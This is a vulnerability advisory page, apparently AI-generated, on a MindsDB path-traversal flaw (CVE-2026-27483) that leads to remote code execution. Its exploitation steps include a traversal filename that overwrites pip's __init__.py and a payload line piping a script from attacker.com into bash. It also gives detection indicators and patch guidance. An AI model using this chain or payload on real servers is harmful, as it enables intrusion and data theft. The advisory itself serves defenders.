
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-27483 is a path traversal vulnerability in MindsDB's /api/files HTTP interface that allows an authenticated attacker to write arbitrary files to any server path, leading to remote code execution (RCE). It affects all MindsDB versions prior to v25.9.1.1 (pip package mindsdb < 25.9.1.1). The vulnerability was discovered by the XlabAI Team of Tencent Xuanwu Lab using their Atuin Automated Vulnerability Discovery Engine, disclosed via GitHub Security Advisory on February 22, 2026, and published to the NVD on February 24, 2026. It carries a CVSS v3.1 base score of 8.8 (High) (Github Advisory, Feedly).
The root cause is CWE-22 (Improper Limitation of a Pathname to a Restricted Directory — Path Traversal), located in mindsdb/api/http/namespaces/file.py. When a multipart file upload is submitted to the PUT /api/files/<name> endpoint, the python-multipart parser is configured with UPLOAD_KEEP_FILENAME: True and no sanitization of the filename field in the Content-Disposition header. The on_file callback directly assigns the raw decoded filename (including ../ sequences) to the upload path, and the file is written to disk before any clear_filename or save_file filtering is applied. An attacker can exploit this to overwrite arbitrary files — including Python package files such as /venv/lib/python3.10/site-packages/pip/__init__.py — and then trigger execution by calling the POST /api/handlers/<handler_name>/install endpoint, which invokes pip via subprocess.Popen (Github Advisory, Patch Commit).
Successful exploitation grants an authenticated attacker full remote code execution on the MindsDB server, with the privileges of the MindsDB process. An attacker can overwrite critical system or Python package files, inject and execute arbitrary OS commands, exfiltrate enterprise data processed by MindsDB, and potentially pivot to other internal systems accessible from the server. The impact is rated HIGH across confidentiality, integrity, and availability (Github Advisory).
A public proof-of-concept (PoC) exploit is available in the GitHub Security Advisory and has been independently published by researcher thewhiteh4t on GitHub (thewhiteh4t PoC). The exploit has also been indexed on Exploit-DB (EDB-52547) and Sploitus. A Nuclei detection template was submitted to the ProjectDiscovery nuclei-templates repository. The EPSS score is approximately 23.3% (96th percentile) according to the GitHub Advisory Database, indicating a high probability of exploitation within 30 days. There is no confirmed evidence of in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog. No specific threat actor attribution has been made (Github Advisory, Recorded Future).
Authenticate to MindsDB: Obtain valid credentials for a MindsDB instance (any authenticated user with access to the file upload UI or API is sufficient). Authenticate and capture the session cookie (e.g., bid=<session-id>).
Craft the malicious multipart request: Construct a PUT /api/files/<name> HTTP request with Content-Type: multipart/form-data. In the file part's Content-Disposition header, set the filename to a path-traversal sequence targeting a writable Python package file, e.g.:
filename="../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py"import os
os.system("curl http://attacker.com/shell.sh | bash")Opening file: b'/root/mdb_storage/tmp/mindsdb_file_xxx/../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py'Trigger RCE via handler install: Send a POST /api/handlers/<any_handler_name>/install request. MindsDB internally calls install_dependencies, which invokes pip via subprocess.Popen, executing the overwritten pip/__init__.py and running the attacker's payload.
Achieve persistence or lateral movement: With RCE established, deploy a reverse shell, exfiltrate data, or install persistence mechanisms on the server (Github Advisory, thewhiteh4t PoC).
PUT requests to /api/files/<name> with multipart bodies containing ../ sequences in the filename field; unexpected outbound connections from the MindsDB server to external IPs (reverse shell callbacks).python_multipart.multipart: Opening file: with path traversal sequences (e.g., ../../../../../../venv/...); POST requests to /api/handlers/<name>/install shortly after anomalous file uploads./venv/lib/python3.10/site-packages/pip/__init__.py; presence of attacker-created files (e.g., /tmp/rce_by_hacker as used in the public PoC); new scripts or binaries in temp directories prefixed with mindsdb_file_.bash, curl, wget, python) following a handler install API call (Github Advisory).Patch: Upgrade MindsDB to version v25.9.1.1 or later, which validates that the uploaded filename contains no path traversal components (Path(file_name).name != file_name check) and sets UPLOAD_KEEP_FILENAME: False to prevent the library from using the attacker-supplied filename (Patch Commit, Release Notes).
Workarounds (if immediate patching is not possible):
/api/files endpoint to trusted, privileged users via network-level controls or a reverse proxy with authentication enforcement./venv/lib/) for unexpected modifications.The vulnerability was discovered by the XlabAI Team of Tencent Xuanwu Lab using their Atuin automated vulnerability discovery engine, and credited in the official advisory. Recorded Future included CVE-2026-27483 in their March 2026 CVE landscape report as one of 31 high-impact vulnerabilities identified that month (Recorded Future). The Hacker Wire published a dedicated technical write-up on the path traversal to RCE chain (The Hacker Wire). Community activity included a Nuclei detection template submitted to ProjectDiscovery's nuclei-templates repository and a public PoC tool released by researcher thewhiteh4t.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."